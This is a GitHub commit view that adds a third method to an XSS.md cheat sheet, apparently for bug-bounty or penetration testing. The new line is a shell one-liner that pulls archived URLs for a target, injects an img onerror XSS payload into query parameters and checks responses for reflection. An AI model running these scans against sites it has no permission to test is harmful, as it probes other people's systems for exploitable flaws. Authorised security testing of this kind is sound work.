Update XSS.md

This commit is contained in:
Mehdi 2024-08-27 08:54:35 +03:30 committed by GitHub
parent ccb02d5bfa
commit 5d425f38ec
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

3
XSS.md
View File

@ -893,6 +893,9 @@ echo "target.com" | gauplus | grep "?" | qsreplace 'xssz"><img/src=x onerror=con
# method 2 # method 2
echo "target.com" | waybackurls | grep "?" | qsreplace 'xssz"><img/src=x onerror=confirm(999)><!--' | httpx -mr '"><img/' echo "target.com" | waybackurls | grep "?" | qsreplace 'xssz"><img/src=x onerror=confirm(999)><!--' | httpx -mr '"><img/'
# method 3
echo "target.com" | waybackurls | grep "?" | qsreplace 'xssz"><img/src=x onerror=confirm(999)><!--' | while read url; do curl -s "$url" | awk '/"><img\//' && echo "Potential XSS at: $url"; done
``` ```